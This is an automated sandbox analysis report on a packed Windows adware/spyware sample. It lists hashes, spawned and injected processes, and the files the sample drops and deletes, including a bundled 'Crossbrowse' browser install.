Skip to main content

SpyTool.Win32.Ardamax_688ed67185


not-a-virus:AdWare.NSIS.ConvertAd.fes (Kaspersky), SpyTool.Win32.Ardamax.FD, Trojan.NSIS.StartPage.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan, SpyTool, Adware

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

MD5: 688ed6718599ebcc64cea4819f60c087

SHA1: 74b2aa40fbbbd1525830a4cb6b0cf74699af1762

SHA256: c7420350465f6a45d9f7c3eb3a461821077f2578dc93cb7ef2dec15b8b1715f0

SSDeep: 6144:es2O4vg2Tes8jyM3G6WysTyun/eIktA0nVHe:YOAZv8XG6Wy6z2Ikt7U

Size: 232149 bytes

File type: EXE

Platform: WIN32

Entropy: Packed

PEID: UPolyXv05_v6

Company: no certificate found

Created at: 2009-12-06 00:50:46

Analyzed on: WindowsXP SP3 32-bit

Summary: SpyTool. A program used to apply passive protection methods to spyware, such as obfuscation, encryption or polymorphism. The original malicious program is usually encrypted/compressed and stored inside the wrapper.

Dynamic Analysis

Payload

No specific payload has been found.

Process activity

The SpyTool creates the following process(es):

nsg13.tmp:912
%original file name%.exe:1504
nsa19.tmp:648
nsa19.tmp:364
gmsd_re_005010077.exe:1880
fsd34.exe:1368
nsm32.tmp:444
setup.exe:564
taskkill.exe:640
taskkill.exe:584
taskkill.exe:952
upgmsd_re_005010077.exe:1364
amisid.exe:1512
amisid.exe:1556
tasklist.exe:164
tasklist.exe:1540
nst16.tmp:1340
nsh2B.tmp:344
nsh2B.tmp:1860
encrypt.exe:560
encrypt.exe:1400
encrypt.exe:424
encrypt.exe:460
3075.exe:976
nsiB.tmp:644
nsw7.tmp:1688
nst36.tmp:2008
nsw22.tmp:272

The SpyTool injects its code into the following process(es):

nsq3D.tmp:240
nsm25.tmp:240

Mutexes

The following mutexes were created/opened:No objects were found.

File activity

The process nsg13.tmp:912 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\3075.exe (14022 bytes)

The process %original file name%.exe:1504 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh2B.tmp (366298 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\setup[1].exe (123415 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm32.tmp (17616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq3C.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm27.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst16.tmp (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\cmmdWriter[1].exe (3656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst2C.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn14.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu17.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl33.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw7.tmp (3656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd35.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\policyname[1].exe (3808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse37.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\7121923af824073a25b2b7e6ba0a6e0e[1].exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\setup_gmsd_re[1].exe (366298 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw22.tmp (6872 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\setup_362[1].exe (17616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\lHFcE[1].exe (11704 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso2.tmp (20572 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3E.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiB.tmp (11704 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Uninstall.exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsdC.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi23.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseF.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\VuuPC_VO2_8907[1].exe (15336 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\vos[1].htm (853 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq3D.tmp (15336 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa5.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb6.tmp (853 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb31.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc8.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst36.tmp (3808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq12.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\Validate[1].exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg1E.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\df4a6a3ed77e60d6758afca091ca0c1f[1].exe (6872 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg13.tmp (123415 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf11.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiA.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso4.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\inetc.dll (784 bytes)

The SpyTool deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsq3C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh2B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm32.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm27.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst16.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst2C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn14.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu17.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl33.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd35.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse37.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw22.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu10.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiB.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsdC.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi23.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseF.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb31.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst36.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq12.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg1E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg13.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf11.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiA.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso4.tmp (0 bytes)

The process nsa19.tmp:648 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsr20.tmp (6085 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr21.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr21.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr21.tmp\amisid.exe (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr21.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr21.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr21.tmp\checks.txt (544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\thankyou[1].php (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr21.tmp\post_reply.htm (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr21.tmp\Registry.dll (784 bytes)

The SpyTool deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsb1F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr21.tmp\Registry.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr21.tmp\md5dll.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr21.tmp\amisid.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr21.tmp\dummy.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr21.tmp\nsisos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr21.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr21.tmp\checks.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr21.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr21.tmp\post_reply.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr21.tmp (0 bytes)

The process nsa19.tmp:364 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsq1D.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq1C.tmp (6085 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq1D.tmp\amisid.exe (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq1D.tmp\Registry.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq1D.tmp\checks.txt (544 bytes)

The SpyTool deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsb1B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq1D.tmp\checks.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq1D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq1D.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq1D.tmp\amisid.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq1D.tmp\Registry.dll (0 bytes)

The process gmsd_re_005010077.exe:1880 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010077\gmsd_re_005010077\1.20\cnf.cyl (269 bytes)

The process nsq3D.tmp:240 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\serlib.dll (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\OfferScreen_12.html (1681 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\Offer1.zip (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\registry.dll (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\img12_1.jpg (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\header.bmp (1568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\OfferScreen_460.html (2281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\Offer2.zip (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\SecondResult.txt (599 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\FirstResult.txt (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\DSS_Unq_IMapplication_mon_remote[1].htm (599 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\nsDialogs.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\FCL_Co_Unq_remote_v5[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\inner.png (146 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\manlib.dll (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\nsCBHTML5.dll (1660 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\blowfish.dll (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\nsisunz.dll (211 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\GetVersion.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\Math.dll (2489 bytes)

The SpyTool deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsd3F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp (0 bytes)

The process fsd34.exe:1368 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\f9626892-7a78-3199-abd2-97bbce96297b\OfferInstaller.exe (1617 bytes)

The process nsm32.tmp:444 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\fsd34.exe (388270 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\FinalInstaller_dotnet4[1].exe (1479345 bytes)

The process setup.exe:564 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\libegl.dll (204 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\wow_helper.exe (67 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\VisualElements\splash-620x300.png (11 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin (4 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\he.pak (254 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\et.pak (202 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\39.6.2171.95\Installer\setup.exe (6841 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\nacl64.exe (12288 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\en-GB.pak (190 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\libexif.dll (303 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\VisualElements\smalllogo.png (9 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Crossbrowse\Crossbrowse.lnk (1 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\bn.pak (1732 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\sl.pak (212 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\tr.pak (221 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\pl.pak (221 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\zh-TW.pak (191 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\nb.pak (207 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\lv.pak (226 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\zh-CN.pak (188 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\sv.pak (208 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\am.pak (302 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\cs.pak (223 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\ffmpegsumo.dll (6337 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\de.pak (225 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\secondarytile.png (3 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Extensions\external_extensions.json (99 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\nacl_irt_x86_64.nexe (20507 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\sw.pak (208 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\chrome_100_percent.pak (7386 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Crossbrowse.lnk (1 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\ro.pak (229 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\chrome_child.dll (261193 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\resources.pak (117997 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\fr.pak (240 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe (5873 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\pt-BR.pak (218 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\sk.pak (230 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\hi.pak (1713 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\chrome_200_percent.pak (7972 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\hr.pak (214 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\kn.pak (1769 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\sr.pak (1611 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\chrome.dll (237340 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\mr.pak (1709 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\fi.pak (213 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\delegate_execute.exe (12288 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\icudtl.dat (76792 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\hu.pak (236 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\es.pak (231 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\chrome_elf.dll (125 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\ca.pak (227 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\bg.pak (1641 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\te.pak (1762 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\vi.pak (248 bytes)
%Documents and Settings%\All Users\Desktop\Crossbrowse.lnk (1 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\th.pak (1702 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\en-US.pak (189 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\ta.pak (1784 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\es-419.pak (226 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\39.6.2171.95.manifest (222 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\chrome.7z (1150215 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\ja.pak (266 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\ml.pak (1827 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\pt-PT.pak (222 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\it.pak (221 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\ru.pak (1613 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\gu.pak (1705 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\ar.pak (294 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\lt.pak (222 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\fil.pak (228 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\crossbrowse.exe (3869 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\el.pak (1668 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\PepperFlash\pepflashplayer.dll (110258 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\id.pak (203 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\libglesv2.dll (5442 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\ko.pak (229 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\VisualElementsManifest.xml (394 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\master_preferences (814 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\ms.pak (207 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\nl.pak (217 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\VisualElements\logo.png (5 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\d3dcompiler_46.dll (22433 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\39.6.2171.95\Installer\chrmstp.exe (6841 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\PepperFlash\manifest.json (2 bytes)
